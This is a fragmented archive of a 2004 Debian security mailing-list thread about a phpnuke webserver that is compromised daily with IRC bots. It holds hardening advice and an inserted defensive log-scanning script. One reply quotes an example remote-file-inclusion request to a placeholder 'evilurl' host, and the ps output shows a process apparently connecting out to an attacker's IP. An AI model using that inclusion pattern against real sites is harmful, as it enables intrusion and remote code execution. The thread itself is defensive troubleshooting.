Advice needed, trying to find the vulnerable code on Debian webserver.
On Sat, Jun 19, 2004 at 10:42:56AM +1000, Ross Tsolakidis wrote:
> Hi all,
>
> I did a search in the logs on some of the suspicious users and found a
> match.
> The files that are being downloaded then executed seem to be IRC bots.
> http://www.energymech.net/
>
> Here are some log files.
>
> 193
ny sense.
The site in question is a phpnuke site with lots of modules.
What steps should I take now?
Thanks very much for everyone's help.
--
Ross
-Original Message-
From: Ross Tsolakidis
Sent: Friday, 18 June 2004 9:20 AM
To: debian-security@lists.debian.org
Subject: RE: Advice needed, t
D]
Cc: Alvin Oga; debian-security@lists.debian.org
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.
On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote:
> > >
> > > Install some rules for it to harden your webserver, see if
> >
On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote:
> > >
> > > Install some rules for it to harden your webserver, see if anything is
> > > flagged in the security log.
> >
> > other web server testing tools
> > http://www.linux-sec.net/Web/#Testing
>
> Has anyone actually used
On Tue, 15 Jun 2004, Alvin Oga wrote:
>
> hi ya
>
> On Wed, 16 Jun 2004, TiM wrote:
>
> >
> > Look at installing mod_security, http://modsecurity.org
> >
> > Install some rules for it to harden your webserver, see if anything is
> > flagged in the security log.
>
> other web server testing
Ross Tsolakidis wrote:
> One of our webservers seems to get compromised on a daily basis.
> When I do a ps ax I see these processes all the time.
I suspect cross site scripting. You should parse your logs and search
for requests like:
GET /~stupiduser/buggy-script.cgi?include=http://www.evilurl/
You could also try installing snoopy, which logs all commands executed by
users to auth.log. Then look for unusual commands executed by user
"www-data" if you suspect insecure PHP scripts etc.
Cheers,
Richard
--
__ _
|_) /| Richard Atterer | GnuPG key:
| \/¯| http://atterer.n
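A defender-side check for the request pattern Richard describes, added here as an example and not code from the original thread: it parses Apache combined-format access log lines, flags any query parameter whose value is an external URL (percent-encoded values included), and counts hits per client. The log lines are constructed; www.evilurl is the placeholder host from the reply.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log line: client ident user [time] "method target proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Schemes that PHP's include()/require() will fetch when allow_url_fopen is on.
REMOTE_PREFIXES = ("http://", "https://", "ftp://")

def find_remote_include_attempts(lines):
    """Return (client_ip, path, param, remote_url) for every request whose
    query string carries a parameter pointing at an external URL, i.e. the
    remote-file-inclusion pattern shown in the quoted request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-combined line: skip it, do not crash
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes once; unquote again to catch double-encoded values
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            value = unquote(value).strip()
            if value.lower().startswith(REMOTE_PREFIXES):
                hits.append((m.group("ip"), parts.path, name, value))
    return hits

def clients_by_hits(hits):
    """Count flagged requests per client IP, most active first."""
    return Counter(ip for ip, _, _, _ in hits).most_common()

# Constructed sample lines (not from the original post); 198.51.100.0/24 is a
# documentation range and www.evilurl is the placeholder host from the reply.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jun/2004:09:12:01 +1000] "GET /modules.php?name=News HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Jun/2004:09:13:44 +1000] "GET /~stupiduser/buggy-script.cgi?include=http://www.evilurl/ HTTP/1.0" 200 731 "-" "lwp-trivial/1.41"',
    '198.51.100.7 - - [18/Jun/2004:09:13:59 +1000] "GET /index.php?page=http%3A%2F%2Fwww.evilurl%2F HTTP/1.0" 200 731 "-" "lwp-trivial/1.41"',
    '10.0.0.9 - - [18/Jun/2004:09:14:10 +1000] "GET /links.php?url=https://www.debian.org/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    'garbage line that is not an access log entry',
]

if __name__ == "__main__":
    for ip, path, param, url in find_remote_include_attempts(SAMPLE_LOG):
        print(f"{ip} {path} {param}={url}")
```

A legitimate redirect or link script that takes a URL parameter will also match, so review hits by path before treating a client as hostile.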
On Wed, Jun 16, 2004 at 11:46:05AM +1200, TiM wrote:
>
> Look at installing mod_security, http://modsecurity.org
>
> Install some rules for it to harden your webserver, see if anything is
> flagged in the security log.
Also notice that modsecurity provides a way to easily chroot your Apache
we
hi ya
On Wed, 16 Jun 2004, TiM wrote:
>
> Look at installing mod_security, http://modsecurity.org
>
> Install some rules for it to harden your webserver, see if anything is
> flagged in the security log.
other web server testing tools
http://www.linux-sec.net/Web/#Testing
c ya
alvin
Look at installing mod_security, http://modsecurity.org
Install some rules for it to harden your webserver, see if anything is
flagged in the security log.
Ross Tsolakidis wrote:
"Wipe, install, set up chkrootkit and run it often."
I've already done that. There was no rootkit.
"How does
On Tue, Jun 15, 2004 at 02:32:21PM +1000, Ross Tsolakidis wrote:
> "Wipe, install, set up chkrootkit and run it often."
> I've already done that. There was no rootkit.
>
An alternative to chkrootkit is rkhunter - it's a set of scripts. You
can find the web address on something like freshmeat.ne
need to find the vulnerable code on this box. And I have no idea
where to begin.
I've tried running virus scans, nothing is infected.
--
Ross
-Original Message-
From: s. keeling [mailto:[EMAIL PROTECTED]
Sent: Tuesday, 15 June 2004 2:06 PM
To: debian-security@lists.debian.org
S
On Tue, 15 Jun 2004, Ross Tsolakidis wrote:
> I'd appreciate some help on how to stop this from happening.
Run something like aide so you can detect when it goes wrong (though there
are some caveats it does not sound like they will hit you) and run a
netflow-collector next to it, if you can. Tha
Incoming from Ross Tsolakidis:
>
> One of our webservers seems to get compromised on a daily basis.
> When I do a ps ax I see these processes all the time.
>
> 18687 ?S 0:00 shell
> 18701 ?Z 0:00 [sh ]
> 18704 ?T 0:00 ./3 200.177.162.185 1524
I vaguely reme